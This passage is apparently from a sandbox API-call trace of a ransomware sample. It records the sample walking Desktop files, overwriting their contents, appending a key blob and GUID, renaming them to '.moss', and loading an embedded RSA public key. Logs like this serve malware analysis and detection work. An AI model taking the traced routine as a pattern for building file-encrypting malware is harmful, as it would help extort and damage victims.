lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0169.091] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0169.091] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0169.091] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.091] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b447b0 [0169.091] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0169.091] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b450c8 [0169.091] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc60 [0169.091] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b45110 [0169.091] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc78 [0169.091] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbcf0 [0169.091] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbb70 [0169.091] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbd08 [0169.092] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0169.092] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0xd23a00 [0169.092] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0xd23a00, Size=0x218) returned 0x3b449a8 [0169.092] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b5d5e8 [0169.092] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbcf0 | out: hHeap=0xcd0000) returned 1 [0169.092] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbd08 | out: hHeap=0xcd0000) returned 1 [0169.092] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0169.092] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0169.092] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5d5e8 | out: hHeap=0xcd0000) returned 1 [0169.092] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbb70 [0169.092] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd310 [0169.092] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbd08 [0169.092] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a50 [0169.092] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x35fbcf0 [0169.092] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd280 [0169.092] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0xd57fe0 [0169.092] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0169.092] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0169.092] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0169.092] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa2470 [0169.092] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a70 [0169.092] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0169.092] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0169.092] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbd08 | out: hHeap=0xcd0000) returned 1 [0169.092] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0169.092] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbcf0 | out: hHeap=0xcd0000) returned 1 [0169.092] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0169.092] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0169.092] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0169.092] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0169.092] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36136d0 | out: hHeap=0xcd0000) returned 1 [0169.092] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b449a8 | out: hHeap=0xcd0000) returned 1 [0169.092] GetCurrentThreadId () returned 0x324 [0169.092] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd57fe0 [0169.092] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0xd31940 [0169.092] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0169.093] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f030 [0169.093] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35deb08 [0169.093] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0169.093] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0169.093] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35ceae8 [0169.093] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.093] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.093] GetCurrentThreadId () returned 0x324 [0169.093] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.093] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.093] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0xd23a00 [0169.093] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.093] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.093] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.093] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.093] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0169.093] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0169.093] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0169.093] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362cc38 [0169.093] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0169.093] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35f7c30 [0169.093] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0169.093] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbb70 [0169.093] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0169.093] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0169.093] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0169.093] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0169.093] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0169.093] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0169.093] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0169.093] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0169.093] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbcf0 [0169.094] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0169.094] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2f0 [0169.094] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0169.094] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0169.094] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd350 [0169.094] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd360 [0169.094] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd340 [0169.094] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbd08 [0169.094] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd360 | out: hHeap=0xcd0000) returned 1 [0169.094] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a50 [0169.094] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd350 | out: hHeap=0xcd0000) returned 1 [0169.094] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbcd8 [0169.094] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd340 | out: hHeap=0xcd0000) returned 1 [0169.094] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbc90 [0169.094] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0169.094] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2c0 [0169.094] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0169.094] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbe8 [0169.094] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0169.094] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc00 [0169.094] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0169.094] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbd20 [0169.094] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0169.094] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbbe8 [0169.094] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc00 | out: hHeap=0xcd0000) returned 1 [0169.094] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd300 [0169.094] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0169.094] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a10 [0169.094] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0169.094] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1c) returned 0x3b3c6d8 [0169.094] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbcf0 | out: hHeap=0xcd0000) returned 1 [0169.094] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbcf0 [0169.094] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0169.094] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x204) returned 0x3b449a8 [0169.094] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0169.095] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa2588 [0169.095] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0169.095] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x210) returned 0x3b44bb8 [0169.095] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0169.095] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10c) returned 0xdc53e8 [0169.095] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0169.095] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa26a0 [0169.095] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbcf0 | out: hHeap=0xcd0000) returned 1 [0169.095] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x200) returned 0x3b5d5e8 [0169.095] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2588 | out: hHeap=0xcd0000) returned 1 [0169.095] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd3e658 [0169.095] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0169.095] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2f030 | out: hHeap=0xcd0000) returned 1 [0169.095] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0169.095] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd3e658 | out: hHeap=0xcd0000) returned 1 [0169.095] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a10 | out: hHeap=0xcd0000) returned 1 [0169.095] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa26a0 | out: hHeap=0xcd0000) returned 1 [0169.095] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44bb8 | out: hHeap=0xcd0000) returned 1 [0169.095] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5d5e8 | out: hHeap=0xcd0000) returned 1 [0169.095] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc53e8 | out: hHeap=0xcd0000) returned 1 [0169.095] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0169.095] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbd20 | out: hHeap=0xcd0000) returned 1 [0169.095] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0169.095] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0169.096] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0169.096] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbd08 | out: hHeap=0xcd0000) returned 1 [0169.096] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbcd8 | out: hHeap=0xcd0000) returned 1 [0169.096] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0169.096] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0169.096] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0169.096] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc78 | out: hHeap=0xcd0000) returned 1 [0169.096] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45110 | out: hHeap=0xcd0000) returned 1 [0169.096] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b449a8 | out: hHeap=0xcd0000) returned 1 [0169.096] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f7c30 | out: hHeap=0xcd0000) returned 1 [0169.096] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cc38 | out: hHeap=0xcd0000) returned 1 [0169.096] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2470 | out: hHeap=0xcd0000) returned 1 [0169.096] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e06d0 | out: hHeap=0xcd0000) returned 1 [0169.096] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0169.096] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0169.096] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613610 | out: hHeap=0xcd0000) returned 1 [0169.096] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b447b0 | out: hHeap=0xcd0000) returned 1 [0169.096] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0169.096] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0169.096] WriteFile (in: hFile=0x664, lpBuffer=0x3b48820*, nNumberOfBytesToWrite=0x14db9, lpNumberOfBytesWritten=0x401fb14, lpOverlapped=0x0 | out: lpBuffer=0x3b48820*, lpNumberOfBytesWritten=0x401fb14*=0x14db9, lpOverlapped=0x0) returned 1 [0169.097] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0169.097] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x14dbe, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.097] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0169.097] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0169.097] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71a00 [0169.097] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x428) returned 0x3b447b0 [0169.097] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3b447b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 41 [0169.097] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x430) returned 0x3b48820 [0169.097] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b447b0 | out: hHeap=0xcd0000) returned 1 [0169.097] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71a00 | out: hHeap=0xcd0000) returned 1 [0169.097] WriteFile (in: hFile=0x664, lpBuffer=0x3b48820*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b48820*, lpNumberOfBytesWritten=0x401fb50*=0x28, lpOverlapped=0x0) returned 1 [0169.097] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0169.097] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0169.097] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0169.097] CloseHandle (hObject=0x664) returned 1 [0169.100] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2b10 [0169.100] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x880) returned 0x3b48820 [0169.100] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2b10 | out: hHeap=0xcd0000) returned 1 [0169.100] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BsP7T_k67YTo.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bsp7t_k67yto.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BsP7T_k67YTo.flv.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bsp7t_k67yto.flv.moss")) returned 1 [0169.101] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0169.101] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.101] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0169.102] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd34af8 | out: hHeap=0xcd0000) returned 1 [0169.102] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0169.102] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cc38 [0169.102] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x76) returned 0xd34af8 [0169.102] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cc38 | out: hHeap=0xcd0000) returned 1 [0169.102] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini") returned=".ini" [0169.102] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd34af8 | out: hHeap=0xcd0000) returned 1 [0169.102] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ca51c70, ftCreationTime.dwHighDateTime=0x1d5d89a, ftLastAccessTime.dwLowDateTime=0x7715b8a0, ftLastAccessTime.dwHighDateTime=0x1d5e116, ftLastWriteTime.dwLowDateTime=0x7715b8a0, ftLastWriteTime.dwHighDateTime=0x1d5e116, nFileSizeHigh=0x0, nFileSizeLow=0xf1a5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dYuqrWvtnb3egSZlbU66.jpg", cAlternateFileName="DYUQRW~1.JPG")) returned 1 [0169.102] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cc38 [0169.102] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f030 [0169.102] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cc38 | out: hHeap=0xcd0000) returned 1 [0169.102] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dYuqrWvtnb3egSZlbU66.jpg") returned=".jpg" [0169.102] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dYuqrWvtnb3egSZlbU66.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dyuqrwvtnb3egszlbu66.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0169.102] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=61861) returned 1 [0169.102] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0169.106] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xf17f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.106] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0169.108] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.108] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.108] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.108] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0xf1a5, lpOverlapped=0x0) returned 1 [0169.108] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.108] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0169.108] lstrlenA (lpString="-----BEGIN PUBLIC 